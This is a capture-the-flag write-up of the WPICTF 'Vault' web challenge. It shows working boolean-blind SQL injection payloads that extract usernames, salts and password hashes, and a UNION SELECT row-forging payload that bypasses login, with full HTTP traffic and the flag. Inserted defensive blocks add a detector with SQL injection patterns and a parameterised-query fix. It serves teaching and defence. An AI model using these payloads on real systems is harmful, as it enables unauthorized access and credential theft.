Tags: sqli
Rating: 3.0
# ▼▼▼Vault(Web:200) 79/605=13.1%▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
```
https://vault.wpictf.xyz
UPDATE: everything fixed
by GODeva
```
---
**【Information gathering】**
```
GET / HTTP/1.1
Host: vault.wpictf.xyz
```
↓
```
<html>
<title>WPI CTF WEB</title>
<link rel="stylesheet" type="text/css" href="static/bootstrap.min.css" />
<link rel="stylesheet" type="text/css" href="static/style.css" />
<body>
<div class = "box" rel="stylesheet">
<h1>Fuller Commons Vault</h1>
Welcome to fuller commons secret digital vault.
To retreive your stuff, log in below.
Active clients
Sign up today to store your content.
<form method="POST" action="./login">
<label for="clientname">Username:</label>
<input type="text" name="clientname" id="clientname">
<label for="password">Password:</label>
<input type="password" name="password" id="password">
```
↓
**(Hint-1)**
```
```
↓
I guessed this was an SQL injection problem
---
**(Hint-2)**
↓ decode with base64
What? You thought this was a flag? Ha that would be to easy. That's just not my style? ~ Goutham
↓
Not a hint
---
**【Identify the location of the vulnerability】**
```
POST /login HTTP/1.1
Host: vault.wpictf.xyz
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
clientname='or'1'='1&password=1
```
↓
`Invalid password for 'or'1'='1!`
```
POST /login HTTP/1.1
Host: vault.wpictf.xyz
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
clientname='or'1'='0&password=1
```
↓
`No such user in the database 'or'1'='0!`
An SQLi vulnerability exists in `clientname`, because the two payloads (true condition vs. false condition) produce different responses
---
```
clientname='or'1'='1&password='or'1'='1 ⇒Invalid password for 'or'1'='1!
clientname='or'1'='1&password='or'1'='0 ⇒Invalid password for 'or'1'='1!
```
↓
There is no SQLi vulnerability in the `password` parameter: the response does not change with the condition
---
`clientname='union+select+1--%2B&password=1`
↓
500 Response
**(1) Error message**
```
OperationalError: SELECTs to the left and right of UNION do not have the same number of result columns // Werkzeug Debugger
```
**(2) DB type**
```
sqlite3.OperationalError
```
**(3) SQL statement**
```
File "/home/vault/vault/secretvault.py", line 58, in login
    connection = sqlite3.connect(os.path.join(directoryFordata, 'clients.db'))
    pointer = connection.cursor()
    search = """SELECT id, hash, salt FROM clients
WHERE clientname = '{0}' LIMIT 1""".format(clientname)
    pointer.execute(search)
    res = pointer.fetchone()
    if not res:
        return "No such user in the database {0}!\n".format(clientname)
    userID, hash, salt = res
```
---
**【Try1】Error-based SQLi**
In SQLite, error-based SQL injection is sometimes possible through the `MATCH` function
↓
`clientname='MATCH '1'||sqlite_version()--+;&password=1`
↓
```
OperationalError: unable to use function MATCH in the requested context // Werkzeug Debugger
```
---
**【Try2】Blind SQLi**
```
clientname='or(select count(id) from clients)>1--+&password=1 ⇒ Invalid password for 'or(select count(id) from clients)>1-- !
clientname='or(select count(id) from clients)>2--+&password=1 ⇒ Invalid password for 'or(select count(id) from clients)>2-- !
clientname='or(select count(id) from clients)>3--+&password=1 ⇒ No such user in the database 'or(select count(id) from clients)>3-- !
clientname='or(select count(id) from clients)=3--+&password=1 ⇒ Invalid password for 'or(select count(id) from clients)=3-- !
```
↓
Three users exist
---
Get the values of `clientname`, `salt` and `hash` one character at a time, using the same true/false response difference as an oracle
```
clientname='or (substr((select group_concat(clientname,",") from/**/clients),1,1))="G"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),2,1))="a"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),3,1))="i"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),4,1))="n"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),5,1))="e"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),6,1))="s"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),7,1))=","+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),8,1))="G"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),9,1))="o"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),10,1))="u"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),11,1))="t"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),12,1))="h"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),13,1))="a"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),14,1))="m"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),15,1))=","+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),16,1))="B"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),17,1))="i"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),18,1))="n"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),19,1))="a"+--+&password=1
clientname='or (substr((select group_concat(clientname,",") from/**/clients),20,1))="m"+--+&password=1
```
↓
Gaines,Goutham,Binam
---
```
clientname='or (substr((select group_concat(salt,",") from/**/clients),1,1))="l"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),2,1))="e"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),3,1))="o"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),4,1))="c"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),5,1))="z"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),6,1))="v"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),7,1))="e"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),8,1))=","+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),9,1))="n"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),10,1))="e"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),11,1))="p"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),12,1))="d"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),13,1))="r"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),14,1))="q"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),15,1))="s"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),16,1))=","+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),17,1))="c"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),18,1))="s"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),19,1))="e"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),20,1))="e"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),21,1))="r"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),22,1))="l"+--+&password=1
clientname='or (substr((select group_concat(salt,",") from/**/clients),23,1))="b"+--+&password=1
```
↓
leoczve,nepdrqs,cseerlb
---
```
clientname='or (substr((select group_concat(hash,",") from/**/clients),1,1))="a"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),2,1))="e"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),3,1))="6"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),4,1))="b"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),5,1))="2"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),6,1))="b"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),7,1))="3"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),8,1))="4"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),9,1))="7"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),10,1))="f"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),11,1))="d"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),12,1))="9"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),13,1))="4"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),14,1))="8"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),15,1))="b"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),16,1))="3"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),17,1))="9"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),18,1))="a"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),19,1))="1"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),20,1))="2"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),21,1))="6"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),22,1))="e"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),23,1))="7"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),24,1))="1"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),25,1))="d"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),26,1))="e"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),27,1))="c"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),28,1))="f"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),29,1))="c"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),30,1))="1"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),31,1))="c"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),32,1))="c"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),33,1))="4"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),34,1))="1"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),35,1))="1"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),36,1))="9"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),37,1))="2"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),38,1))="5"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),39,1))="a"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),40,1))="1"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),41,1))="d"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),42,1))="d"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),43,1))="c"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),44,1))="9"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),45,1))="f"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),46,1))="9"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),47,1))="9"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),48,1))="5"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),49,1))="9"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),50,1))="4"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),51,1))="9"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),52,1))="5"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),53,1))="1"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),54,1))="7"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),55,1))="d"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),56,1))="9"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),57,1))="8"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),58,1))="3"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),59,1))="f"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),60,1))="b"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),61,1))="0"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),62,1))="2"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),63,1))="7"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),64,1))="b"+--+&password=1
clientname='or (substr((select group_concat(hash,",") from/**/clients),65,1))=","+--+&password=1
・・・
```
↓
```
ae6b2b347fd948b39a126e71decfc1cc411925a1ddc9f995949517d983fb027b,
6bad0bd9907898e3c7d6b2139241ac7591a4556b2f9fbc41ed15a31e6d2df738,
49d790f22b2248638bf56f8a573c8e95eac2ed2f63a8f8eef97972d1b2d77bb7
```
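The character-by-character extraction above leaves a very recognisable trace: one client sending dozens of near-identical login requests whose only difference is the `substr` offset. The following detector is an added example, not part of the writeup or of the challenge; it runs over a constructed request log (the tab-separated `ip method path status body` format is an assumption for the demo) and flags single tautology probes separately from a full oracle walk.

```python
"""Added example, not from the writeup: a small detector for the boolean-based
blind enumeration shown above, run over constructed request logs. The log
format (tab-separated ip, method, path, status, form body) is an assumption."""
import re
from collections import defaultdict
from urllib.parse import parse_qs

# SQL syntax that should never appear inside a username field.
SQLI_MARKERS = re.compile(
    r"(?i)(\bunion\b|\bselect\b|group_concat|substr\(|/\*\*/|--\s|'\s*or\b)"
)
# Captures the character offset N of a substr(<subquery>, N, 1) oracle probe.
SUBSTR_OFFSET = re.compile(r"(?i)substr\(.*?\),\s*(\d+)\s*,\s*1\s*\)")


def _probe(offset, ch):
    """Builds one oracle probe in the shape seen above (constructed sample input)."""
    return ("'or (substr((select group_concat(clientname,\",\") from/**/clients),"
            f"{offset},1))=\"{ch}\"+--+")


# Constructed sample log: one client walking the oracle character by character,
# one client sending a single tautology probe, one client logging in normally.
SAMPLE_LOG = "\n".join("\t".join(f) for f in [
    ("203.0.113.5", "POST", "/login", "200", "clientname=" + _probe(1, "G") + "&password=1"),
    ("203.0.113.5", "POST", "/login", "200", "clientname=" + _probe(2, "a") + "&password=1"),
    ("203.0.113.5", "POST", "/login", "200", "clientname=" + _probe(3, "i") + "&password=1"),
    ("203.0.113.5", "POST", "/login", "200", "clientname=" + _probe(4, "n") + "&password=1"),
    ("198.51.100.7", "POST", "/login", "200", "clientname='or'1'='1&password=1"),
    ("192.0.2.9", "POST", "/login", "302", "clientname=O'Brien&password=pa%24%24word"),
    ("192.0.2.9", "GET", "/", "200", ""),
])


def analyse(log_text, enum_threshold=3):
    """Groups requests by client IP and returns a verdict per client:
    'clean', 'sqli-probe' (SQL syntax seen) or 'blind-sqli-enumeration'
    (at least enum_threshold distinct substr offsets from one client)."""
    per_client = defaultdict(lambda: {"requests": 0, "sqli_requests": 0, "offsets": set()})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ip, _method, _path, _status, body = line.split("\t", 4)
        rec = per_client[ip]
        rec["requests"] += 1
        flagged = False
        # parse_qs decodes '+' and %XX for us, so markers are matched on the
        # value the application would actually have interpolated into SQL.
        for values in parse_qs(body, keep_blank_values=True).values():
            for value in values:
                if SQLI_MARKERS.search(value):
                    flagged = True
                for m in SUBSTR_OFFSET.finditer(value):
                    rec["offsets"].add(int(m.group(1)))
        if flagged:
            rec["sqli_requests"] += 1

    findings = {}
    for ip, rec in per_client.items():
        if rec["sqli_requests"] == 0:
            verdict = "clean"
        elif len(rec["offsets"]) >= enum_threshold:
            verdict = "blind-sqli-enumeration"
        else:
            verdict = "sqli-probe"
        findings[ip] = {
            "requests": rec["requests"],
            "sqli_requests": rec["sqli_requests"],
            "offsets": sorted(rec["offsets"]),
            "verdict": verdict,
        }
    return findings


if __name__ == "__main__":
    for ip, f in analyse(SAMPLE_LOG).items():
        print(ip, f)
```

The marker regex is deliberately narrow (`'or`, `--`, `/**/`, `union`, `select`, `substr(`) so that a legitimate username such as `O'Brien` is not flagged; the enumeration verdict rests on the rising `substr` offset rather than on any single request, which is what distinguishes an extraction from a one-off scanner probe.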
---
**【Try1: Identify the password】**
```
File "/home/vault/vault/secretvault.py", line 65, in login
    res = pointer.fetchone()
    if not res:
        return "No such user in the database {0}!\n".format(clientname)
    userID, hash, salt = res

    calculatedHash = hashlib.sha256(password + salt)
    if calculatedHash.hexdigest() != hash:
        return "Invalid password for {0}!\n".format(clientname)

    flask.session['userID'] = userID
    return flask.redirect('/')
```
↓
`calculatedHash = hashlib.sha256(password + salt)`
↓
A password-list attack did not identify the password.
---
**【Try2: Direct login】**
`calculatedHash = hashlib.sha256(password + salt)`
The hash is computed from the submitted `password` and the `salt` returned by the query, and both `hash` and `salt` come from the row the query returns. Because `clientname` is injectable, a `UNION SELECT` can supply that whole row (`id`, `hash`, `salt`) itself, so the comparison is made against values chosen by the attacker.
clientname=`Gaines` → id=`2`
salt=`1`
password=`1` (any value will do, as long as the hash is computed from it)
↓
hash=sha256(password + salt)=sha256("1" + "1")=`4fc82b26aecb47d2868c4efbe3581732a3e7cbcc6c2efb32062c08170a05eeb8`
↓
The resulting SQL statement:
`SELECT id, hash, salt FROM clients WHERE clientname = ''UNION/**/SELECT/**/"2","4fc82b26aecb47d2868c4efbe3581732a3e7cbcc6c2efb32062c08170a05eeb8","1"-- `
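The root cause in the SQL statement shown earlier (string formatting of `clientname` into the query) and the forged-row login it enables are easiest to see side by side. The block below is an added example, not the challenge's own code: it rebuilds the `login` logic from the traceback against an in-memory SQLite database, once as written and once with a bound parameter and a constant-time digest comparison. The demo users, salts and hashes are constructed; the `password + salt` concatenation is done on bytes because this is Python 3, and the forged row uses single-quoted SQL literals in place of the double-quoted ones in the writeup's payload.

```python
"""Added example (not the challenge's code): the login logic from the Werkzeug
traceback, rebuilt against an in-memory SQLite database in a vulnerable form
and a parameterised form. Demo rows are constructed for this example."""
import hashlib
import hmac
import sqlite3

# Constructed demo rows: (id, clientname, salt, sha256(password + salt)).
_DEMO_USERS = [
    (1, "alice", "s4lt1", hashlib.sha256(b"correct-horse" + b"s4lt1").hexdigest()),
    (2, "bob", "s4lt2", hashlib.sha256(b"battery-staple" + b"s4lt2").hexdigest()),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE clients (id INTEGER, clientname TEXT, salt TEXT, hash TEXT)")
    conn.executemany("INSERT INTO clients VALUES (?, ?, ?, ?)", _DEMO_USERS)
    return conn


def login_vulnerable(conn, clientname, password):
    """Mirrors the page's code: str.format builds the query, so clientname can
    append a UNION SELECT that supplies its own (id, hash, salt) row.
    Returns the user id on success, None otherwise."""
    search = """SELECT id, hash, salt FROM clients
WHERE clientname = '{0}' LIMIT 1""".format(clientname)
    res = conn.execute(search).fetchone()
    if not res:
        return None
    user_id, stored_hash, salt = res
    # Python 3 needs bytes here; the original was Python 2 str concatenation.
    calculated = hashlib.sha256(password.encode() + salt.encode()).hexdigest()
    if calculated != stored_hash:
        return None
    return user_id


def login_fixed(conn, clientname, password):
    """Hardened form: clientname is passed as a bound parameter, so it is data
    and never SQL, and the digest comparison is constant-time."""
    res = conn.execute(
        "SELECT id, hash, salt FROM clients WHERE clientname = ? LIMIT 1",
        (clientname,),
    ).fetchone()
    if not res:
        return None
    user_id, stored_hash, salt = res
    calculated = hashlib.sha256(password.encode() + salt.encode()).hexdigest()
    if not hmac.compare_digest(calculated, stored_hash):
        return None
    return user_id


# The writeup's forged row: id 2, hash = sha256("1" + "1"), salt "1".
FORGED_HASH = hashlib.sha256(b"1" + b"1").hexdigest()
PAYLOAD = "'UNION SELECT 2,'{0}','1'-- ".format(FORGED_HASH)


def demo():
    """Runs the forged row through both versions and a real login through the fixed one."""
    conn = make_db()
    return {
        "forged_hash": FORGED_HASH,
        "vulnerable_accepts_payload": login_vulnerable(conn, PAYLOAD, "1"),
        "fixed_rejects_payload": login_fixed(conn, PAYLOAD, "1"),
        "fixed_accepts_real_user": login_fixed(conn, "alice", "correct-horse"),
    }


if __name__ == "__main__":
    print(demo())
```

With the parameterised query the payload simply becomes a username that does not exist, so the `UNION` never reaches the SQL parser; note that the bound parameter is the fix, while `hmac.compare_digest` only closes the separate timing side channel of the `!=` comparison.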
---
```
POST /login HTTP/1.1
Host: vault.wpictf.xyz
Connection: close
Content-Length: 119
Cache-Control: max-age=0
Origin: https://vault.wpictf.xyz
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://vault.wpictf.xyz/
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8
clientname='UNION/**/SELECT/**/"2","4fc82b26aecb47d2868c4efbe3581732a3e7cbcc6c2efb32062c08170a05eeb8","1"--+&password=1
```
↓
```
HTTP/1.1 302 FOUND
Server: nginx/1.13.12
Date: Sat, 14 Apr 2018 13:04:47 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 209
Location: https://vault.wpictf.xyz/
Connection: close
Set-Cookie: session=eyJ1c2VySUQiOiIyIn0.DbON7w.AXruR3kgJ2-tqE8RLndXYV6yOg0; HttpOnly; Path=/
Strict-Transport-Security: max-age=31536000
<title>Redirecting...</title>
<h1>Redirecting...</h1>
You should be redirected automatically to target URL: /. If not click the link.
```
↓
```
GET / HTTP/1.1
Host: vault.wpictf.xyz
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://vault.wpictf.xyz/
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8
Cookie: session=eyJ1c2VySUQiOiIyIn0.DbON7w.AXruR3kgJ2-tqE8RLndXYV6yOg0
```
↓
```
HTTP/1.1 200 OK
Server: nginx/1.13.12
Date: Sat, 14 Apr 2018 13:07:05 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 128
Connection: close
Strict-Transport-Security: max-age=31536000
Welcome back valid user! Your digital secret is: "WPI{y0ur_fl46_h45_l1k3ly_b31n6_c0mpr0m153d}" (Log out)
```
↓
`WPI{y0ur_fl46_h45_l1k3ly_b31n6_c0mpr0m153d}`